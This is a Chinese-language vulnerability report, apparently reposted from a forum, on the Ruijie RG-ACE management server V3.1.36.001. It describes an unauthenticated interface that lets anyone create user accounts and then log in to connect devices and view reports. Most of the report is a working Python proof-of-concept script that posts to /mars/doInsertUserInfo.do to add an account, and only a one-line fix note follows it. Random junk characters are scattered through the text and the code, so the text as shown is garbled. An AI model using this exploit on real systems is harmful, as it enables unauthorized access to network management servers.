锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
) H* T9 k: L# U; C  u3 V0 F  G

& V0 p4 r' p, h* b: ]测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
$ a' D3 K8 G& Z. l

漏洞证明：
. e  O4 c+ I, r' d6 e
% O: j1 m( _1 E3 X



# u/ ]8 O1 w9 y+ s: X$ Q+ E4 m% c
执行脚本
$ p8 }0 S* ~' |#! /usr/bin/env python
  {( I# C  ]( e3 a) w#coding=gbk
! z2 p# {* d$ b0 a. N" Z#RG-ACE管理服务器 V3.1.36.001
4 Q2 l* @/ d2 a- i5 o/ O2 kimport urllib2, urllib,cookielib
; }$ T- Y& e+ t% o' x8 m. ?5 Vurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
* j8 z' v# Z; K7 R4 V8 gopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
6 K) G3 ^4 L' h* ~8 {opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
) ^" T/ x' d: Y* ^6 g* ]  ]post=(("event","userManager.doInsertUserInfo"),
( e* I# ^) Y. O- Q6 W4 B("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
3 m6 `" w$ F9 z7 N# v("trueName","ad"),
4 S2 C2 H$ D, d  `! O("email",""),
* \! J: |5 t$ c("mobilePhone",""),
("officePhone",""),
("addr",""),
- A6 }* \9 S1 Y. V! j("submit","确定"))
! h( B. d9 o" _+ surllib2.install_opener(opener)
0 d! q0 w/ J* Y. f- E) B: Ip=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
+ N" D) u6 T; n# Z8 E
登录，连接设备
! u/ I8 K$ v& t
1 `" @) i8 C' f) r
1 e" p0 l) t  l2 e- z8 S1 X+ A$ z
9 D& w. D( t/ C/ s$ T
- `" V: W+ p8 u3 `" E
6 E* B/ I$ q9 |默认的管理员admin权限更大点

+ h+ j; r: a: t: _
) E/ N4 m0 p2 I& d' x) a
4 @( J# D4 d/ T4 E( l; b9 k, h! r
* n1 X% ]5 _: B4 D" v2 v$ @& J: n
修复方案：
: I1 [% j) C, i9 U# l. G" K加强对接口的权限验证